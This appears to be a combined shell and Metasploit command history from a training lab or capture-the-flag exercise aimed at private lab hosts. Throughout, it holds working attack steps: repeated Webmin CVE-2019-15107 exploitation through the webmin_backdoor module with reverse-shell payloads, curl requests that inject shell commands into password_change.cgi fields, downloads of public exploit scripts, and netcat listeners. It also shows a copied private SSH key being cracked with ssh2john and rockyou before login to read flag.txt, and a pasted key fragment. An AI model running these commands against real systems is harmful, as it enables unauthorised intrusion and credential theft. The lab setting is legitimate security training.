ssh -o "IdentitiesOnly=yes" -i ./pk 10.1.17.4
ssh -o "IdentitiesOnly=yes" -i ./pk 10.1.17.4
ssh -o "IdentitiesOnly=yes" -i ./pk eve@10.1.17.4
ssh -i ./pk eve@10.1.17.4
cat pk
ssh -i pk eve@10.1.17.4
chmod 0600 pk
ls
cd top-secret/
ls
cat flag.txt
nmap localhost
nmap localhost
nmap 172.18.1.5
nmap 172.18.1.5:10000
nmap -h
nmap -iL 172.18.1.5
nmap -sV 172.18.1.5
nmap -sC 172.18.1.5
nmap -r 172.18.1.5
nmap -sV 172.18.1.5:10000
nmap -sP 172.18.1.5/10000
nmap -sP 172.18.1.5
nmap -sV 172.18.1.5
ssh 172.18.1.5
ls
vim ssh2john.py
connect 172.18.1.5
connect 172.18.1.5 10000
exploit
connect 172.18.1.5 10000
exploit(/root/) > exit
connect 172.18.1.5 10000
search
search cve:2019 type:exploit
search cve:2019-15107 type:exploit
use exploit/linux/http/webmin_backdoor
show options
set LHOST 172.18.1.5
set LPORT 10000
exploit
set RHOSTS 172.18.1.5
set RPORT 10000
exploit
nmap localhost
set LHOST 10.1.135.83
exploit
set LPORT 0
show options
set LPORT 4444
exploit
sdsssasdsss
sksssdsks
s
sdsdsds
sesxs
s
exploit
exit
msfconsole
ls
vim id_rsa
ls
python3 ssh2john.py id_rsa
python3 ssh2john.py id_rsa > hash
ls
john hash
john --wordlist hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh 10.1.17.4
ls
ls
ls -a
cd .ssh
ls
cd known_hosts
cat known_hosts
ls
cd ..
mv id_rsa .ssh
ls
cd .ssh
ls
cd ..
ls
ssh 10.1.17.4
ssh eve@10.1.17.4
ls
ls
cd .ssh
ls
chmod 0600 id_rsa
ls
cat top-secret/
cd top-secret/
ls
cat flag.txt
ping 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
172.18.1.5
172.18.1.5
nmap --help
nmap -v 172.18.1.5
nmap -v 22:172.18.1.5
nmap -v 172.18.1.5/22
nmap --help
nmap -sV 172.18.1.5
nmap --help
nmap -sV 172.18.1.5
nmap -h
help
quit
msfconsole
msfconsole -h
search
search cve:2019 type:exploit
search webmin type:exploit
exploit/linux/http/webmin_backdoor
y
exploit/linux/http/webmin_backdoorchange.cgi
exploit/linux/http/webmin_backdoor
show options
RHOSTS
set RHOSTS file:/root/
show options
set LHOST 172.18.1.5
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
check
msfconsole
search
search webmin type:exploit
exploit/linux/http/webmin_backdoor
show options
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
msfconsole
/usr/share/wordlists/
ls
exploit
exit
msfconsole
nano id_rsa
ls
ssh2john.py
python ssh2john.py
python ssh2john.py id_rsa > hash.txt
ls
cat hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
pwd
ls
ssh 10.1.17.4
ssh eva@10.1.17.4
ssh-copy-id eve@10.1.17.4
ssh eve@10.1.17.4
ls
ssh -h
ssh -i id_rsa eve@10.1.17.4
ls -la
chmod u=rw id_rsa
ls-la
ls -la
chmod 600 id_rsa
ls-la
ls -la
ls
ls -la
cd top-secret
ls
cat flag.txt
su kali
cd
cd /home/kali
pwd
ping -c 1 172.18.1.5
man tr
man tr
traceroute 172.18.1.5
nmap 172.18.1.5
nmap --help
nmap 172.18.1.5
nmap -s 172.18.1.5
nmap -sS 172.18.1.5
nmap -sO 172.18.1.5
sudo nmap -sO 172.18.1.5
sudo nmap -6 172.18.1.5
nmap -6 172.18.1.5
nmap 172.18.1.5
nmap -f 172.18.1.5
nmap -f 172.18.1.5
nmap -sT 172.18.1.5
nmap -sU 172.18.1.5
nmap -sX 172.18.1.5
nmap -sT 172.18.1.5
nmap -sA 172.18.1.5
nmap -sw 172.18.1.5
nmap -sW 172.18.1.5
nmap -sM 172.18.1.5
nmap -sN 172.18.1.5
nmap -sF 172.18.1.5
nmap -sX 172.18.1.5
nmap -sC 172.18.1.5
nmap -sV 172.18.1.5
curl https://dl.packetstormsecurity.net/1908-exploits/CVE-2019-15107.sh.txt
ls
vim ssh2john.py
msfconsole -h
msfconsole --help
msfconsole -q
help
search CVE-2019-15107
use exploit/linux/http/webmin_backdoor
set TARGET
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
show options
check
exp
exploit
msfconsole
ls
cd .ssh
ls
vim
nano
ls
cat ssh
ls
nvim ssh2john.py
vim ssh2john.py
./ssh2john.py
./ssh2john.py ssh
./ssh2john.py ssh >> ssh_key
cat ssh_key
john --help
find / -name "wordlist"
find / -name "wordlist" $2 > /dev/null
find / -name "wordlist" $3 > /dev/null
find / -name "wordlist" $1 > /dev/null
find / -name "wordlists"
cat /usr/share/wordlists
ls /usr/share/wordlists
cd /usr/share/wordlists
ls
cat rockyou.txt
john ssh_key
john --help
ls
ls rockyou.txt
john --wordlist /usr/share/wordlists/rockyou.txt ssh_key
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_key
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_key
ssh --help
ssh eve@10.1.17.4
ssh eve@10.1.17.4
cd /home/kali
ls
cat ssh
ssh -i ssh eve@10.1.17.4
chmod 0600 ssh
ssh -i ssh eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
ssh -i ssh eve@10.1.17.4
nampls
ls
nmap --help
nmap --help
nmap --help
mkdir task
mkdir task
mkdir task
sudo nmap -sC -sV -oA task
sudo nmap -sC -sV -oA task/1.5 172.18.1.5
list
ls
help
search webmin
use exploit/linux/http/webmin_backdoor
info
set RHOST 172.18.1.5
run
info
run
set LHOST 127.0.0.1
run
ip a
set LHOST 10.1.135.83
ls
ls /root/
run
stty raw -echo
fg
fg
sessions
msfconsole
search Webmin
use exploit/linux/http/webmin_backdoor
info
msfconsole
ls task
cat task/1.5.nmap
set RHOSTS 172.18.1.5
ip a
set LHOST 10.1.135.83
stty raw -echo
fg
ls
ecport TERM=xterm
export TERM=xterm
echo $TERM
echo $TERM
export TERM=xterm=256color
export SHELL=/bin/bash
stty size
run
stty raw -echo; session -i 1
cat task/1.5.nmap
use exploit/linux/http/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
msfconsole
ls .ssh
ls .ssh
ls .ssh
ssh-keygen
ssh-keygen
sesxsists
sesxsists
sesxsists
sesxsists
sesxsists
sesxsists
exit
nc -l 9999
exit
ip a
ls -la task
nc -l 9999 >> task/ssh_key
ip a
cat task/ssh_key
vi task/ssh_key
ssh-add -l
eval `ssh-agent`
ssh-add task/ssh_key
chmod 600 task/ssh_key
ssh-add task/ssh_key
ls
ls
./ssh2john.py task/ssh_key
./ssh2john.py task/ssh_key
./ssh2john.py task/ssh_key
ls
ls -la
ls -la
ls -la
ls -la
ssh-add task/ssh_key
./ssh2john.py task/ssh_key >> ssh_for_john
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_for_john
ssh-add task/ssh_key
ls -la
ls top-secret/
cat top-secret/flag.txt
exit
ssh eve@10.1.17.4
nmap -A 172.18.1.5
exit
msfconsole
touch script.py
nano script.py
python script.py https://172.18.1.5:10000 cmd
https://10.10.20.166:10000/password_change.cgi
python script.py https://172.18.1.5:10000 bash
use exploit/unix/webapp/webmin_show_cgi_exec
show targets
show options
set RHOST 172.18.1.5
run
show options
set target 0
run
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
exploit
set LPORT 10000
exploit
set LHOST 172.18.1.5
exploit
show options
exploit
use exploit/linux/http/webmin_backdoor
show targets
show options
exit
msfconsole
use exploit/linux/http/webmin_backdoor
show options
set LHOST 172.18.1.5
set LPORT 10000
run
set RPORT 10000
run
set ForceExploit true
run
set RHOST 172.18.1.5
run
set LHOST 10.1.135.83
run
ls
cd ..
ls
cd kali
ls
cd .ssh
mkdir .ssh
cd .ssh
ls
nano id_rsa
ssh 172.18.1.5
ssh 172.18.1.5
chmod 400 id_rsa
ssh 172.18.1.5
ssh eve@172.18.1.5
ls
cd ..
ls
python ssh2john.py
python ssh2john.py .ssh/id_rsa
python ssh2john.py .ssh/id_rsa >> test.txt
ls
john
john --wordlist=/usr/share/wordlists/rockyou.txt test.txt
ls
ssh eve@172.18.1.5
ssh eve@172.18.1.5
ssh eve@172.18.1.5
ssh eve@172.18.1.5
ssh eve@172.18.1.5 -i .ssh/id_rsa
ssh 172.18.1.5 -i .ssh/id_rsa
ssh 172.18.1.5 -i .ssh/id_rsa
ssh eve@10.1.17.4 .ssh/id_rsa
ls
ls .ssh
ssh eve@10.1.17.4 .ssh/id_rsa
ls
cd .ssh
ls
ssh eve@10.1.17.4 id_rsa
cd /tmp/
ls
cd systemd-private-f5b5bb4f40af483f9e37b70a73a9e214-systemd-timesyncd.service-Hhudsq/
ls
sudo su
ls
cd ..
cd -
cd /home/eve/tmp
ls
cd /home/eve/
ls
cd top-secret/
ls
cat flag.txt
nmap -A 172.18.1.5
nmap -p 10000 172.18.1.5
msf console
exit
msfconsole
git --version
git clone https://github.com/jas502n/CVE-2019-15107
git clone https://github.com/jas502n/CVE-2019-15107
python --version
python CVE_2019_15107.py https://10.10.20.166:10000 cmd
ls
cd CVE-2019-15107
python CVE_2019_15107.py https://10.10.20.166:10000 cmd
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
search show exploits
show exploits
msfconsole
use exploit/linux/http/webmin_backdoor
set LHOST 172.18.1.5
set LHOST 10.1.135.83
set RHOST 172.18.1.5
set RPORT 10000
msfconsole
ls
python ssh2john.py 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
touch s.txt
nano s.txt
python ssh2john.py s.txt
nano s.txt
ls
cat s.txt
msfconsole
msfconsole
msfconsole
nano s.txt
nano s.txt
python ssh2john.py s.txt
touch ss.txt
nano ss.txt
john -w:/usr/share/wordlist/
john -w:/usr/share/wordlists/
chmod 400 id_rsa
chmod 400 ss.txt
ssh -i ss.txt eve@10.1.17.4
ssh -i ss.txt eve@10.1.17.4
ssh -i ss.txt eve@10.1.17.4
cat ss.txt
cat s.txt
ssh -i s.txt eve@10.1.17.4
chmod 400 s.txt
ls
cat top-secret/
cd top-secret/
ls
cat flag.txt
traceroute
nmap
ping 172.18.1.5
traceroute 172.18.1.5
nmap | grep 'httpd'
nmap | grep 'MAN'
nmap 172.18.1.5
whois 172.18.1.5
nmap 172.18.1.5
nmap --help
nmap -sn 172.18.1.5
nmap -v -sn 172.18.1.5
nmap -v 172.18.1.5
nmap -v -E 172.18.1.5
nmap -v -e 172.18.1.5
nmap -v -s 172.18.1.5
nmap -sV 172.18.1.5
POST /password_change.cgi HTTP/1.1
use exploit/linux/http
use exploit/linux/http/webmin_backdoor
show options
LHOST=172.18.1.5
set LHOST=172.18.1.5
set LHOST 172.18.1.5
set LPORT 10000
use
run
exploit
set RHOSTS 172.18.1.5
exploit
show options
search webmin
use exploit/linux/http/webmin_backdoor
show options
set LHOST 10.1.135.83
check
run
run
python ssh2john.py id_rsa_eve >hash
cat hash
john --worldlist=/usr/share/wordlists/rockyou.txt hash
john --worldlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/dirb/big.txt hash
john --wordlist=/usr/share/wordlists/dirb/big.txt hash
cat hash
clear
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh 10.1.18.22
clear
clear
ssh eve@10.1.17.4
clear
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eve@10.1.17.4
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eve@10.1.17.4
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ls
chmod 0600 id_rsa_eve
ls
cd top-secret/
ls
cat flag.txt
su kali
cd ..
cd kali
ls
ls -lA
cat .zsh_history
nmap 1-1000 172.18.1.5
nmap -p- 172.18.1.5
telnet 172.18.1.5 10000
curl 172.18.1.5:10000
curl 172.18.1.5:10000/unauthenticated/css/fonts-roboto.min.css?19369999999999902
curl 172.18.1.5:10000/session_login.cgi
nmap -p- 172.18.1.5
curl 172.18.1.5:10000/sdfsdfsdf
curl -c - 172.18.1.5:10000/sdfsdfsdf
nmap 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV -O 172.18.1.5
nmap -sn 172.18.1.5
nmap -sN 172.18.1.5
sudo nmap -sN 172.18.1.5
nmap -sV 172.18.1.5
msf
msfconsole
search CVE-2019-15107
use 0
set rhosts 172.18.1.5
set rport 10000
exploit
set lhost 10.1.135.83
exit
ifconig -a
ip a
msfconsole
search CVE-2019-15107
use 0
set rhosts 172.18.1.5
set rport 10000
set lhost 192.168.130.246
set lport 4444
execute
exploit
set payload cmd/unix/reverse_bash
exploit
set payload cmd/unix/reverse
exploit
set payload cmd/unix/interact
set payload php/meterpreter/reverse_tcp
exploit
set payload java/meterpreter/reverse_tcp
exploit
set payload generic/shell_reverse_tcp
exploit
set payload windows/meterpreter/reverse_tcp
exploit
set payload windows/shell/reverse_tcp
exploit
set payload ruby/shell_reverse_tcp
exploit
set payload windows/meterpreter/reverse_ord_tcp
exploit
set payload cmd/unix/reverse_netcat_gaping
exploit
set payload php/meterpreter_reverse_tcp
exploit
set payload php/meterpreter/reverse_tcp
exploit
exit
msfconsole
search exploit/linux/http
search CVE-2019-15107
use 0
set rhost 172.18.1.5
set rhost 10.1.135.83
set rport 10000
set lhost 192.168.130.246
set lport 4444
exploit
set rhost 172.18.1.5
set lhost 10.1.135.83
exploit
set payload php/meterpreter/reverse_tcp
exploit
set payload java/meterpreter/reverse_tcp
exploit
set payload cmd/unix/reverse_perl
exploit
exit
ls ~
ls -la ~
ls ~/.ssh
ssh-keygen -t rsa -b 4096 -C "quack@email.com"
cat ~/.ssh/id_rsa.pub
msfconsole
search CVE-2019-15107
use é
search CVE-2019-15107
use 0
set rhost 172.18.1.5
set rport 10000
set lhost 10.1.135.83
set lport 4444
exploit
exit
quit
exit
exit -y
ls ~/.ssh
cat ~/.ssh/authorized_keys
msfconsole
set lhost 10.1.135.83
set rhost 172.18.1.5
set lport 4444
set rport 10000
exploit
search CVE-2019-15107
use é
use 0
set rhost 172.18.1.5
set rport 10000
set lhost 10.1.135.83
set lport 4444
exploit
exit
msfconsole
search CVE-2019-15107
use 0
set rhost 172.18.1.5
set rport 10000
set lhost 10.1.135.83
set lport 4444
exploit
exit
ssh eve@172.18.1.5
ls ~/.ssh/
exit
ls
cd ~
ls
scp eve@172.18.1.5/home/eve/.ssh ~/eve
scp eve@172.18.1.5/home/eve/.ssh/id_rsa ~/eve
scp eve@172.18.1.5/home/eve/.ssh/id_rsa ~/id_rsa
scp eve@172.18.1.5/home/eve/.ssh/id_rsa
scp eve@172.18.1.5/home/eve/.ssh/id_rsa here
scp eve@172.18.1.5 /home/eve/.ssh/id_rsa here
scp eve@172.18.1.5:/home/eve/.ssh/id_rsa here
scp eve@172.18.1.5:/home/eve/.ssh/id_rsa
ls
scp eve@172.18.1.5:/home/eve/.ssh/id_rsa id_rsa
scp eve@172.18.1.5:/home/eve/.ssh/id_rsa.pub id_rsa.pub
ls /usr/share/wordlists/
john
python ssh2john.py id_rsa > id_rsa.hash
ls
ls -la
ls -la .john/
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
ls
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh -i id_rsa eve@10.1.17.4
ls -la
ls -la top-secret/
cat top-secret/flag.txt
exit
exit
sudo nmap -sT -p- 172.18.1.5
ping 172.18.1.5
ip addr
ip addr
nmap -sT -p- 172.18.1.5
nmap -sU -p- 172.18.1.5
sudo nmap -sU -p- 172.18.1.5
sudo nmap -sU 172.18.1.5
nmap -sV 172.18.1.5
curl -d "expired='ls /' & new1=password & new2=password & old='ls /'" -X POST 172.18.1.5:10000/password_change.cgi
curl -d "expired='ls /' & new1=password & new2=password & old='ls /'" -X POST -H "Referer: http://172.18.1.5:10000/" 172.18.1.5:10000/password_change.cgi
su kali
cd ~/home/kali
d ..
cd ..
ls
cd kali
curl -d "expired='ls /' & new1=password & new2=password & old='ls /'" -H "Referer: http://172.18.1.5:10000/" -X POST 172.18.1.5:10000/password_change.cgi
curl -d "expired='ls /' & new1=42 & new2=42 & old='ls /'" -H "Referer: http://172.18.1.5:10000/" -X POST 172.18.1.5:10000/password_change.cgi
curl -d "new1=42 & new2=42 & old='ls /'" -H "Referer: http://172.18.1.5:10000/" -X POST 172.18.1.5:10000/password_change.cgi
curl -d "new1=test&new2=test&old='ls /'" -H "Referer: http://172.18.1.5:10000/" -X POST 172.18.1.5:10000/password_change.cgi
wget https://raw.githubusercontent.com/MuirlandOracle/CVE-2019-15107/main/CVE-2019-15107.py
ls
cat ssh2john.py
ls
chmod +x CVE-2019-15107.py
./CVE-2019-15107.py
./CVE-2019-15107.py -p 10000 172.18.1.5
ip addr
nc -lvnp 42000
nc -lvnp 42000
ip addr
nc -lvnp 42000
nc -lvnp 42000
./CVE-2019-15107.py -p 10000 172.18.1.5
ping 81.2.195.254
ping 10.1.17.4
cd .ssh
ls
mkdir ~/.ssh
ls
cd .ssh
ls
nano id_rsa
nano id_rsa.pub
ssh eve@10.1.17.4
cd .ssh
ls
ls
ls -al
chmod 600 id*
ls -al
cd ..
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ls
cat commands.txt
hydra
python ssh2john.py ~/.ssh id_rsa > id_rsa.hash
ls
cat id_rsa.hash
python ssh2john.py ~/.ssh/id_rsa > id_rsa.hash
cat id_rsa.hash
john id_rsa.hash
ls
cat /usr/share/worldlists
cat /usr/share/wordlsits
cat /usr/share/wordlists
ls /usr/share/wordlists
cat /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt
john id_rsa.hash -wordlist=/etc/share/wordlist/rockyou.txt
john id_rsa.hash -wordlist=/etc/share/wordlists/rockyou.txt
john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
cd ~/top-secret
ls
cat flag.txt
ssh eve@10.1.17.4
nmap --help
nmap --help
man nmap
-sV
nmap -sV 172.18.1.5
use CVE-2019-15107
sow options
show options
run
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 1000
set LHOST 10.1.135.83
check
run
cd /root/
cat WARNING-READ-ME.txt
msfconsole
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
show options
set LHOST 10.1.135.83
show options
check
exploit
bash
~# chmod 0600 id_rsa
chmod 0600 id_rsa
ufw
iptable\\niptable
iptable
iptables
ping
ping
ping 172.18.1.5
ping 172.18.1.5:80
telnet 172.18.1.5:80
telnet 172.18.1.5 80
telnet 172.18.1.5 8080
cat etc/services
ls
cat ssh2john.py
ls
ls
Downloads
ls
ls -a
cd ..
ls
ls Templates
ls Templates -q
ls Templates -a
netstat
netstat -tunlp
MAN ss
man ss
man telnet
man telnet -a 172.18.1.5
telnet -tunlp -a 172.18.1.5
ssh 172.18.1.5
f
fq
fg
nmap 172.18.1.5
man  nmap
nmap 172.18.1.5 -sV --version-all
man mfs5
man msf
man hydra
man wireshark
msf > search webmin
mfsconsole
use exploit/linux/http/webmin_backdoor
show option
show options
exploit
show advaced
show advanced
show info
exploit +@172.18.1.5
set rhosts 172.18.1.5
exploit
set rhosts +@172.18.1.5
exploit
set rhosts 172.18.1.5
exploit
set lhosts 10.1.135.83
exploit
set lhosts 100.100.100.13
exploit
set lhosts 10.1.135.83
exploit
check
set lhost 10.1.135.83
exploit
exit
msfconsole
nmap 172.18.1.5
mfsconsole
exploit
use exploit/linux/http/webmin_backdoor
exploit
set lhost 10.1.135.83
set rhosts 172.18.1.5
exploit
exit
msfconsole
nano id_rsa
nano id_rsa
nano id_rsa
ls
python3 ssh2john.py id_rsa >> hash
cat ahsh
cat hash
ls hash
cd hash
ls
man jon
john -h
ls
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eva@10.1.17.4
man ssh
ls
ssh -i /id_rsa eva@10.1.17.4
chmod 600 id_rsa
ssh -i /id_rsa eva@10.1.17.4
ssh -i /id_rsa eve@10.1.17.4
ssh -i id_rsa eva@10.1.17.4
ls
ls -la
ls top-secret/
cat top-secret/flag.txt
ping 127.18.1.5
nmap --help
man nmap
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
cd /root/
sudo cd /root/
search
search -o type:exploit
search Webmin
use exploit/linux/http/webmin_backdoor
show options
RHOSTS=file:/root/
show options
set RHOSTS 172.18.1.5
show options
set LHOST 10.1.135.83
show options
run
xit
exit
msfconsole -q
nano id_rsa
python ssh2john.py
python ssh2john.py id_rsa > hash
john -help
john --wordlist=/usr/share/wordlists/rockyou.txt hash
chmod 600 id_rsa
ssh -i id_rsa 10.1.17.4
ls
cd top-secret/
ls -la
cat flag.txt
ip addr
ipconfig /all
172.18.1.5
nmap --help
nmap -sp 172.18.1.5
nmap -sp 172.18.1.5/24
nmap -sp 172.18.1.5
nmap -sn 172.18.1.5
nmap -sL 172.18.1.5
nmap -sF 172.18.1.5
nmap -sN 172.18.1.5
nmap -sS 172.18.1.5
nmap -sT 172.18.1.5
nmap -sV 172.18.1.5
nmap -Pn --script vuln 172.18.1.5
nmap -Pn --script vuln 10000 172.18.1.5
nmap --help
nmap -Pn --script vuln 172.18.1.5/10000
nmap -sV -Pn 172.18.1.5 -p 10000
nmap -sV -Pn snet-sensor-mtg
nmap -sV -Pn snet-sensor-mgmt
nmap -sV -Pn 172.18.1.5 -p 10000
msf > help
help
search
search cve:2019 type:exploit
help search
search cve:2019 type:exploit name:Webmin
search cve:2019 type:exploit description:Webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST localhost
run
set LHOST 10.1.135.83
run
exit
msfconsole
nano id_rsa
ls
python ssh2john.py
python ssh2john.py id_rsa > hash
john --help
john hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ls
pwd
ssh --help
ssh eve@10.1.17.4 -i id_rsa
chmod 0600 id_rsa
pwd
cd ..
pwd
ls
cd zdislav
ls
ls -la
cd ..
ls -la
cd ..
ls
cd /home
ls
cdi
cd eve
ls
cd top-secret
ls
cat flag.txt
sudo nmap 172.18.1.5
sudo nmap -St -p-  172.18.1.5
sudo nmap  -p-  172.18.1.5
nmap  -p-  172.18.1.5
nmap  help
nmap  -help
nmap  -sV  172.18.1.5
nikto
search webmin
ino
use exploit/linux/http/webmin_backdoor
show options
set rhost 172.18.1.5
set lhost 10.1.135.83
check
run
exit
msfconsole
nano ide_Rsa
nano ide_Rsa
ls
python sshjohn.py
python ssh2john.py
python ssh2john.py ide_Rsa
python ssh2john.py ide_Rsa > hash
john --help
john hash
cat ssh2john.py
john --wordlist=/usr/share/wordlists/rockyou.txt  hash
ssh --help
ssh eve㉿10.1.17.4
ssh 10.1.17.4 -l eve
ssh 10.1.17.4 -l eve -i ide_Rsa
chmod 0600 ide_Rsa
ssh 10.1.17.4 -l eve -i ide_Rsa
ls
cd top-secret/
ls
nano flag.txt
ip a
nmap 172.18.1.5
nmap -sv 172.18.1.5
nmap -s 172.18.1.5
nmap 172.18.1.5
nmap -p0-65535 172.18.1.5
ssh 172.18.1.5
msfconsole
search WEBMIN
INFO 0
USE 5
nmap
nmap 172.18.1.5
nmap 172.18.1.5 -Sv
nmap -sV 172.18.1.5
msf
msfconsole
search CVE
search webmin 1.920
use 0
help
options
ip a
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
options
exploit
exploit'
exploit
sessions -u 2
